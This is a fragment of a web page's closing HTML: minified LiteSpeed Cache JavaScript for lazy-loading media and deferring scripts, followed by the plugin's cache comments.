document.createElement("p"),nt=Y&&1<window.devicePixelRatio,at={elements_selector:".lazy",container:Z||Y?document:null,threshold:300,thresholds:null,data_src:"src",data_srcset:"srcset",data_sizes:"sizes",data_bg:"bg",data_bg_hidpi:"bg-hidpi",data_bg_multi:"bg-multi",data_bg_multi_hidpi:"bg-multi-hidpi",data_poster:"poster",class_applied:"applied",class_loading:"litespeed-loading",class_loaded:"litespeed-loaded",class_error:"error",class_entered:"entered",class_exited:"exited",unobserve_completed:!0,unobserve_entered:!1,cancel_on_exit:!0,callback_enter:null,callback_exit:null,callback_applied:null,callback_loading:null,callback_loaded:null,callback_error:null,callback_finish:null,callback_cancel:null,use_native:!1},ot="src",it="srcset",rt="sizes",ct="poster",lt="llOriginalAttrs",st="loading",ut="loaded",dt="applied",ft="error",_t="native",gt="data-",vt="ll-status",bt=[st,ut,dt,ft],pt=[ot],ht=[ot,ct],mt=[ot,it,rt],Et={IMG:function(t,e){h(t,function(t){y(t,mt),O(t,e)}),y(t,mt),O(t,e)},IFRAME:function(t,e){y(t,pt),A(t,ot,l(t,e.data_src))},VIDEO:function(t,e){a(t,function(t){y(t,pt),A(t,ot,l(t,e.data_src))}),y(t,ht),A(t,ct,l(t,e.data_poster)),A(t,ot,l(t,e.data_src)),t.load()}},It=["IMG","IFRAME","VIDEO"],yt={IMG:j,IFRAME:function(t){L(t,pt)},VIDEO:function(t){a(t,function(t){L(t,pt)}),L(t,ht),t.load()}},Lt=["IMG","IFRAME","VIDEO"];return t.prototype={update:function(t){var e,n,a,o=this._settings,i=W(t,o);{if(p(this,i.length),!Z&&tt)return q(o)?(e=o,n=this,i.forEach(function(t){-1!==Lt.indexOf(t.tagName)&&S(t,e,n)}),void p(n,0)):(t=this._observer,o=i,t.disconnect(),a=t,void o.forEach(function(t){a.observe(t)}));this.loadAll(i)}},destroy:function(){this._observer&&this._observer.disconnect(),K(this._settings).forEach(function(t){I(t)}),delete this._observer,delete this._settings,delete this.loadingCount,delete this.toLoadCount},loadAll:function(t){var e=this,n=this._settings;W(t,n).forEach(function(t){v(t,e),D(t,n,e)})},restoreAll:function(){var e=this._settings;K(e).forEach(function(t){P(t,e)})}},t.load=function(t,e){e=o(e);D(t,e)},t.resetStatus=function(t){i(t)},t}),function(t,e){"use strict";function n(){e.body.classList.add("litespeed_lazyloaded")}function a(){console.log("[LiteSpeed] Start Lazy Load"),o=new LazyLoad(Object.assign({},t.lazyLoadOptions||{},{elements_selector:"[data-lazyloaded]",callback_finish:n})),i=function(){o.update()},t.MutationObserver&&new MutationObserver(i).observe(e.documentElement,{childList:!0,subtree:!0,attributes:!0})}var o,i;t.addEventListener?t.addEventListener("load",a,!1):t.attachEvent("onload",a)}(window,document);</script><script data-no-optimize="1">window.litespeed_ui_events=window.litespeed_ui_events||["mouseover","click","keydown","wheel","touchmove","touchstart"];var urlCreator=window.URL||window.webkitURL;function litespeed_load_delayed_js_force(){console.log("[LiteSpeed] Start Load JS Delayed"),litespeed_ui_events.forEach(e=>{window.removeEventListener(e,litespeed_load_delayed_js_force,{passive:!0})}),document.querySelectorAll("iframe[data-litespeed-src]").forEach(e=>{e.setAttribute("src",e.getAttribute("data-litespeed-src"))}),"loading"==document.readyState?window.addEventListener("DOMContentLoaded",litespeed_load_delayed_js):litespeed_load_delayed_js()}litespeed_ui_events.forEach(e=>{window.addEventListener(e,litespeed_load_delayed_js_force,{passive:!0})});async function litespeed_load_delayed_js(){let t=[];for(var d in document.querySelectorAll('script[type="litespeed/javascript"]').forEach(e=>{t.push(e)}),t)await new Promise(e=>litespeed_load_one(t[d],e));document.dispatchEvent(new Event("DOMContentLiteSpeedLoaded")),window.dispatchEvent(new Event("DOMContentLiteSpeedLoaded"))}function litespeed_load_one(t,e){console.log("[LiteSpeed] Load ",t);var d=document.createElement("script");d.addEventListener("load",e),d.addEventListener("error",e),t.getAttributeNames().forEach(e=>{"type"!=e&&d.setAttribute("data-src"==e?"src":e,t.getAttribute(e))});let a=!(d.type="text/javascript");!d.src&&t.textContent&&(d.src=litespeed_inline2src(t.textContent),a=!0),t.after(d),t.remove(),a&&e()}function litespeed_inline2src(t){try{var d=urlCreator.createObjectURL(new Blob([t.replace(/^(?:<!--)?(.*?)(?:-->)?$/gm,"$1")],{type:"text/javascript"}))}catch(e){d="data:text/javascript;base64,"+btoa(t.replace(/^(?:<!--)?(.*?)(?:-->)?$/gm,"$1"))}return d}</script><script data-no-optimize="1">var litespeed_vary=document.cookie.replace(/(?:(?:^|.*;\s*)_lscache_vary\s*\=\s*([^;]*).*$)|^.*$/,"");litespeed_vary||(sessionStorage.getItem("litespeed_reloaded")?console.log("LiteSpeed: skipping guest vary reload (already reloaded this session)"):fetch("/wp-content/plugins/litespeed-cache/guest.vary.php",{method:"POST",cache:"no-cache",redirect:"follow"}).then(e=>e.json()).then(e=>{console.log(e),e.hasOwnProperty("reload")&&"yes"==e.reload&&(sessionStorage.setItem("litespeed_docref",document.referrer),sessionStorage.setItem("litespeed_reloaded","1"),window.location.reload(!0))}));</script><script data-optimized="1" type="litespeed/javascript" data-src="https://js.cybernoz.com/wp-content/litespeed/js/607a720420d1a125ebaaf88a388205ff.js?ver=ab4b7"></script></body></html> <!-- Page optimized by LiteSpeed Cache @2026-04-05 12:37:09 --> <!-- Page cached by LiteSpeed Cache 7.8.1 on 2026-04-05 12:37:09 --> <!-- Guest Mode --> <!-- QUIC.cloud UCSS in queue -->